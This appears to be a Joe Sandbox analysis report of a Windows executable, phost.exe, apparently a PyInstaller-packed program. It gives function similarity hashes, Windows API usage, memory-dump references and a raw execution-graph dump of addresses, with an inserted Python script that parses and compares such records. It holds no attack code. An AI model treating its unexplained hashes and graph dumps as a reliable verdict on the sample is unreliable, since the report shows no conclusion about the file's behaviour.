                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction ID: ecdcd835cf6a9ee2b43269b9b8425ff971e6cc1a1ff5728d8ea65714d6c72f9e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A81B232F0824285FF764F2D8910A7A36B0EB11BE8F558235DA09D7299DF2FE9418313
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF62CC7352C,?,00000000,00007FF62CC73F23), ref: 00007FF62CC77F22
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: 9e3e78a9366c6c5261d8b800243136ec92a4df68d373ed967d5fba4a87944466
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2251D372F081128AFF25DF289D55ABD27B1AB407B8F504235DE1ED2AE5DF39A4428701
                                                                                                                                                                                                                              APIs
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
• Instruction ID: 29793d33bfc6032f87cb60117973c068b6ae1cb61288d16ba602b48e55620ad9
• Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
• Instruction Fuzzy Hash: 5D516D62F086418AFF11DF79D8507BE23B2AB48BA8F148635DE4D9B689DF78D4418702
APIs
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction ID: cd2147f3bebf089ffe8f942daa7e0d08e6bf949f80addf632e2bc888a597300d
• Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction Fuzzy Hash: B411AC31F1C14282FE54976DED4427952B5FF857A4F448030DB498BB9DCD2DD899A602
APIs
Strings
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
• Instruction ID: b7cc968165eee0f38db95e1a7453134d57cab0086e7c4270e46766b882815d25
• Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
• Instruction Fuzzy Hash: F0411922F1C68245FF259B29DC0177A66B0EB84BB8F148336EE5C86AD5DE3CD441C701
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC890B6
  • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
  • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62CC7CC15), ref: 00007FF62CC890D4
Strings
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\phost.exe
• API String ID: 3580290477-3962158096
• Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction ID: 6092133590d028b7397a533541ae74e3ffc510a30d331cd87eafde9870ce62ec
• Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction Fuzzy Hash: 29416D32B08A5285EF1A9F29DC444BA23B4EB457E4B554135E94EC3B85DE3DE482C302
APIs
Strings
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction ID: 3a1dd2001475c2807039a6aea3c7ce3c551dede802cbbb48c34d65f8ce13dd8d
• Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction Fuzzy Hash: ED41A032B19A9181DB619F29E8447AA67A0FB887E4F404136EA4DC7B98EF3CD401C741
APIs
Strings
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                              • Instruction ID: 9d2c86d8cd478c54ee3e874a0b3b69098077f951905a6eb395963df330aed0fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94214872B0868182FF218B19D81463E33B1FB84B94F918235C68C83288DF7DE545C742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction ID: c61f3df4c510bdd12ff0e8001e60e0a1449cac8e2fbe8132dc8b29c4fa9e55af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92112E32618B8182EB618F19F94026977F4FB88B98F588230DA8D4B755DF3DD5558B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction ID: c9f46e3962f408f0fb48dcd015578d8f863998336716b95769d9c5b2823da4c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71017C22B1824386FF21AF68986627E67B0EF48778F80413AD54DC6691DE3CE504DA56
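The function records above each carry an Opcode ID, an Instruction ID, two fuzzy hashes and a Similarity block (API ID, String ID, API String ID). On this page the second half of the API String ID repeats wherever the String ID repeats (336475711 for both records whose String ID is ":"), so it is a per-API and per-string pairing key; the report does not say how those numbers are derived. The Python below is an added example, not code from Joe Sandbox or from the sample: it parses records in this layout and diffs two parsed sets by Opcode ID (same function) or API String ID (same API/string usage). Sample A reproduces entries from this section, shortened; sample B is a constructed second report holding one record copied from A and one placeholder record whose all-zero hashes are not real values. The regexes, the record-boundary rule and the function names are this example's own assumptions about the layout.

```python
# Parse Joe Sandbox per-function "Similarity" records and diff two reports.
import re

# Constructed sample A: copied from the function entries in this section
# (de-indented; Associated lists and some fields shortened).
SAMPLE_A = """\
• Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction ID: 3a1dd2001475c2807039a6aea3c7ce3c551dede802cbbb48c34d65f8ce13dd8d
• Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction Fuzzy Hash: ED41A032B19A9181DB619F29E8447AA67A0FB887E4F404136EA4DC7B98EF3CD401C741
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
• Instruction ID: 9d2c86d8cd478c54ee3e874a0b3b69098077f951905a6eb395963df330aed0fa
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction ID: c61f3df4c510bdd12ff0e8001e60e0a1449cac8e2fbe8132dc8b29c4fa9e55af
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
• Instruction ID: c9f46e3962f408f0fb48dcd015578d8f863998336716b95769d9c5b2823da4c1
"""

# Constructed sample B (hypothetical second report): the CurrentDirectory record
# copied from A plus a placeholder record whose all-zero hashes are not real.
SAMPLE_B = """\
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
Similarity
• API ID: PlaceholderApi
• String ID: x
• API String ID: 0-0
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000000
"""

FIELD = re.compile(r"^\s*[•*-]?\s*([A-Za-z ]+?):\s*(.*)$")   # "• Key: value"
MULTI = {"Associated"}                                        # repeats inside one record
SRC = re.compile(r"^(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                 r"\s*based on PE:\s*(?P<pe>true|false)")

def parse_function_records(text):
    """One dict per function. A record starts at 'API ID' (first bullet under
    'Similarity'); a repeated single-valued key also starts one, which copes
    with a leading record whose Similarity block was cut off (as on this page)."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:                       # section headers: APIs, Similarity, ...
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key in MULTI:
            cur.setdefault(key, []).append(value)
            continue
        if (key == "API ID" and cur) or key in cur:
            records.append(cur)
            cur = {}
        cur[key] = value
    if cur:
        records.append(cur)
    return records

def source_info(record):
    """Dump name, image base and PE flag from the 'Source File' bullet, or None."""
    m = SRC.match(record.get("Source File", ""))
    if not m:
        return None
    return {"dump": m.group("dump"), "image_base": int(m.group("offset"), 16),
            "based_on_pe": m.group("pe") == "true"}

def compare_reports(recs_a, recs_b, key="Opcode ID"):
    """Identifiers shared/unique between two reports, keyed by Opcode ID
    (same function) or 'API String ID' (same API/string pairing)."""
    a = {r[key] for r in recs_a if key in r}
    b = {r[key] for r in recs_b if key in r}
    return {"shared": sorted(a & b), "only_a": sorted(a - b), "only_b": sorted(b - a)}

if __name__ == "__main__":
    ra, rb = parse_function_records(SAMPLE_A), parse_function_records(SAMPLE_B)
    for r in ra:
        print(r.get("API ID", "<no similarity block>"), r["Opcode ID"][:16], source_info(r))
    print(compare_reports(ra, rb))
    print(compare_reports(ra, rb, key="API String ID"))
```

Feed it the text of two reports' function sections and the Opcode ID diff tells you which bootloader functions are byte-identical across samples, while the API String ID diff tolerates recompilation as long as the API and string usage is unchanged.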

Execution Graph

Execution Coverage: 9.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1741
Total number of Limit Nodes: 11

[Execution graph: the interactive node/edge rendering is not reproducible as text. Node addresses lie in the 7ff62cc71000 to 7ff62cc9a540 range of the image based at 00007FF62CC70000. Node labels in the graph name these Windows APIs: TlsAlloc, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, HeapAlloc, GetDriveTypeW, GetCurrentDirectoryW, GetFileAttributesExW, GetLastError, GetModuleFileNameW, GetTimeZoneInformation, FindFirstFileExW, SetDllDirectoryW, LoadLibraryExW, FreeLibrary, LocalFree, PostMessageW, GetMessageW, LeaveCriticalSection, IsProcessorFeaturePresent, IsDebuggerPresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter; the remaining labels are CRT internals (__scrt_* startup routines, __FrameHandler3, __vcrt_FlsAlloc, _fread_nolock, _invalid_parameter_noinfo, _get_daylight, _isindst, memcpy_s, fegetenv, __std_exception_destroy, Concurrency::details::SchedulerProxy::DeleteThis).]
8687 7ff62cc745b0 8651->8687 8679 7ff62cc71a03 8652->8679 8789 7ff62cc80744 8652->8789 8654 7ff62cc800bc 11 API calls 8654->8656 8655 7ff62cc719e5 8657 7ff62cc71a08 8655->8657 8658 7ff62cc719e9 _get_daylight 8655->8658 8656->8649 8793 7ff62cc8040c 8657->8793 8796 7ff62cc72910 8658->8796 8662 7ff62cc71a26 _get_daylight 8665 7ff62cc72910 9 API calls 8662->8665 8663 7ff62cc71a45 8664 7ff62cc71a5c _get_daylight 8663->8664 8667 7ff62cc71a7b 8663->8667 8666 7ff62cc72910 9 API calls 8664->8666 8665->8679 8666->8679 8668 7ff62cc80744 7 API calls 8667->8668 8669 7ff62cc71b01 8668->8669 8670 7ff62cc71b16 _get_daylight 8669->8670 8671 7ff62cc71b35 8669->8671 8674 7ff62cc72910 9 API calls 8670->8674 8672 7ff62cc8040c _fread_nolock 23 API calls 8671->8672 8673 7ff62cc71b4a 8672->8673 8675 7ff62cc71b50 _get_daylight 8673->8675 8676 7ff62cc71b6f 8673->8676 8674->8679 8677 7ff62cc72910 9 API calls 8675->8677 8678 7ff62cc72710 9 API calls 8676->8678 8676->8679 8677->8679 8678->8679 8679->8654 8956 7ff62cc76350 8680->8956 8683 7ff62cc7338d 8683->8603 8685 7ff62cc73381 8685->8683 9011 7ff62cc76040 8685->9011 8688 7ff62cc745bc 8687->8688 9164 7ff62cc86004 8688->9164 8690 7ff62cc74606 8691 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8690->8691 8692 7ff62cc7392b 8691->8692 8692->8563 8693 7ff62cc77f80 8692->8693 8694 7ff62cc77fa4 8693->8694 8695 7ff62cc80744 7 API calls 8694->8695 8698 7ff62cc7807b __std_exception_destroy 8694->8698 8696 7ff62cc77fc0 8695->8696 8696->8698 9237 7ff62cc87938 8696->9237 8698->8566 8699 7ff62cc80744 7 API calls 8701 7ff62cc77fd5 8699->8701 8700 7ff62cc8040c _fread_nolock 23 API calls 8700->8701 8701->8698 8701->8699 8701->8700 8703 7ff62cc800ec 8702->8703 9261 7ff62cc7fe98 8703->9261 8705 7ff62cc80105 8705->8563 8707 7ff62cc7c8c0 8706->8707 8708 7ff62cc72734 GetCurrentProcessId 8707->8708 8709 7ff62cc72787 8708->8709 8710 7ff62cc72620 8 API calls 8709->8710 8711 7ff62cc727f1 8710->8711 8712 7ff62cc7c5c0 
__FrameHandler3::FrameUnwindToEmptyState 6 API calls 8711->8712 8713 7ff62cc72801 8712->8713 8713->8577 8715 7ff62cc790f5 8714->8715 9308 7ff62cc78760 GetCurrentProcess OpenProcessToken 8715->9308 8718 7ff62cc78760 7 API calls 8719 7ff62cc79121 8718->8719 8720 7ff62cc79167 LocalFree LocalFree 8719->8720 8721 7ff62cc79183 8720->8721 8722 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8721->8722 8723 7ff62cc73c55 8722->8723 8723->8582 8723->8583 8725 7ff62cc7c5c9 8724->8725 8726 7ff62cc73ca7 8725->8726 8727 7ff62cc7c950 IsProcessorFeaturePresent 8725->8727 8726->8545 8728 7ff62cc7c968 8727->8728 8729 7ff62cc7c96f capture_previous_context 8727->8729 8728->8729 9318 7ff62cc7c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8729->9318 8736 7ff62cc78868 __std_exception_destroy 8732->8736 8733 7ff62cc788ea GetTempPathW GetCurrentProcessId 8735 7ff62cc78918 __std_exception_destroy 8733->8735 8734 7ff62cc7892f CreateDirectoryW 8734->8735 8737 7ff62cc78957 8734->8737 8735->8734 8743 7ff62cc788d8 __std_exception_destroy 8735->8743 8736->8733 8739 7ff62cc788cc 8736->8739 8736->8743 8740 7ff62cc72810 7 API calls 8737->8740 8737->8743 8738 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8741 7ff62cc73cbb 8738->8741 8742 7ff62cc72810 7 API calls 8739->8742 8740->8743 8741->8589 8741->8590 8742->8743 8743->8738 8745 7ff62cc76dc5 _get_daylight 8744->8745 8746 7ff62cc72910 9 API calls 8745->8746 8747 7ff62cc76de7 8745->8747 8746->8747 8747->8614 8754 7ff62cc76e0c 8748->8754 8749 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8751 7ff62cc76f41 8749->8751 8751->8618 8752 7ff62cc76f9a 8753 7ff62cc72710 9 API calls 8752->8753 8762 7ff62cc76f2f 8753->8762 8754->8752 8755 7ff62cc76f87 8754->8755 8757 7ff62cc74550 6 API calls 8754->8757 8759 7ff62cc76f74 8754->8759 8754->8762 8763 7ff62cc76f5d 8754->8763 9319 7ff62cc71840 8754->9319 9323 7ff62cc77e10 8754->9323 9330 7ff62cc71600 8754->9330 
8756 7ff62cc72710 9 API calls 8755->8756 8756->8762 8757->8754 8760 7ff62cc72710 9 API calls 8759->8760 8760->8762 8762->8749 8764 7ff62cc72710 9 API calls 8763->8764 8764->8762 8766 7ff62cc77106 8765->8766 8770 7ff62cc76fc2 8765->8770 8766->8620 8767 7ff62cc770da 8769 7ff62cc770f2 8767->8769 9410 7ff62cc79050 FreeLibrary 8767->9410 8769->8620 8770->8767 9409 7ff62cc79050 FreeLibrary 8770->9409 8775 7ff62cc7367e 8773->8775 8774 7ff62cc7368f 8774->8609 8775->8774 9411 7ff62cc79050 FreeLibrary 8775->9411 8778 7ff62cc736bc GetModuleFileNameW 8777->8778 8778->8635 8778->8636 8780 7ff62cc79342 8779->8780 8781 7ff62cc7932f FindClose 8779->8781 8782 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8780->8782 8781->8780 8783 7ff62cc79363 8782->8783 8783->8639 8785 7ff62cc72834 8784->8785 8786 7ff62cc728d0 MessageBoxW 8785->8786 8787 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8786->8787 8788 7ff62cc72900 8787->8788 8788->8637 8790 7ff62cc80774 8789->8790 8804 7ff62cc804d4 8790->8804 8792 7ff62cc8078d 8792->8655 8853 7ff62cc8042c 8793->8853 8795 7ff62cc71a20 8795->8662 8795->8663 8797 7ff62cc7c8c0 8796->8797 8798 7ff62cc72930 GetCurrentProcessId 8797->8798 8799 7ff62cc72979 8798->8799 8949 7ff62cc72620 8799->8949 8802 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8803 7ff62cc72a31 8802->8803 8803->8679 8805 7ff62cc8053e 8804->8805 8806 7ff62cc804fe 8804->8806 8805->8806 8808 7ff62cc8054a 8805->8808 8815 7ff62cc8a884 8806->8815 8811 7ff62cc80658 8808->8811 8810 7ff62cc80525 8810->8792 8812 7ff62cc8069d 8811->8812 8814 7ff62cc80688 8811->8814 8823 7ff62cc80570 8812->8823 8814->8810 8841 7ff62cc8a5cc 8815->8841 8818 7ff62cc8a8bf 8818->8810 8820 7ff62cc8a90b 8820->8818 8849 7ff62cc8a7e8 8820->8849 8822 7ff62cc8a969 8822->8810 8824 7ff62cc805f3 8823->8824 8825 7ff62cc8058a 8823->8825 8824->8814 8825->8824 8827 7ff62cc8c2f4 8825->8827 8828 7ff62cc8c324 8827->8828 8831 7ff62cc8c1a4 8828->8831 8830 7ff62cc8c33d 8830->8824 
8837 7ff62cc8878c 8831->8837 8833 7ff62cc8c1cb 8834 7ff62cc8c1d1 _fread_nolock 8833->8834 8835 7ff62cc8c1e2 SetFilePointerEx 8833->8835 8834->8830 8835->8834 8836 7ff62cc8c1fa GetLastError 8835->8836 8836->8834 8838 7ff62cc88795 _fread_nolock _get_daylight 8837->8838 8839 7ff62cc887aa _fread_nolock _get_daylight 8837->8839 8838->8833 8839->8838 8840 7ff62cc887ed _invalid_parameter_noinfo 8839->8840 8840->8838 8842 7ff62cc8a623 8841->8842 8843 7ff62cc8a5e8 GetLastError 8841->8843 8842->8818 8846 7ff62cc8a638 8842->8846 8844 7ff62cc8a5f8 8843->8844 8845 7ff62cc8a613 SetLastError 8844->8845 8845->8842 8847 7ff62cc8a654 GetLastError SetLastError 8846->8847 8848 7ff62cc8a66c 8846->8848 8847->8848 8848->8820 8850 7ff62cc8a813 8849->8850 8851 7ff62cc8a884 4 API calls 8850->8851 8852 7ff62cc8a83a 8851->8852 8852->8822 8854 7ff62cc80456 8853->8854 8859 7ff62cc80485 8853->8859 8855 7ff62cc80465 _fread_nolock _get_daylight 8854->8855 8856 7ff62cc804a2 8854->8856 8854->8859 8858 7ff62cc8047a _invalid_parameter_noinfo 8855->8858 8860 7ff62cc801ac 8856->8860 8858->8859 8859->8795 8862 7ff62cc801f5 8860->8862 8866 7ff62cc801db _fread_nolock _get_daylight 8860->8866 8861 7ff62cc801f0 _invalid_parameter_noinfo 8861->8862 8862->8859 8864 7ff62cc801e5 _fread_nolock _get_daylight 8864->8861 8866->8862 8866->8864 8867 7ff62cc802e1 _invalid_parameter_noinfo 8866->8867 8868 7ff62cc8bacc 8866->8868 8899 7ff62cc8bf1c 8866->8899 8867->8866 8869 7ff62cc8baf4 _fread_nolock _get_daylight 8868->8869 8870 7ff62cc8bb0d 8868->8870 8869->8866 8870->8869 8872 7ff62cc8bb61 _fread_nolock _get_daylight 8870->8872 8873 7ff62cc8bb92 8870->8873 8871 7ff62cc8bef9 _invalid_parameter_noinfo 8871->8869 8872->8871 8874 7ff62cc8bbb9 8873->8874 8875 7ff62cc8bbf3 8873->8875 8879 7ff62cc8bbc6 _fread_nolock _get_daylight 8873->8879 8874->8879 8895 7ff62cc8bbe2 8874->8895 8907 7ff62cc8d66c 8875->8907 8877 7ff62cc8bc04 8911 7ff62cc8a9b8 8877->8911 8881 7ff62cc8bbd2 _invalid_parameter_noinfo 8879->8881 8880 
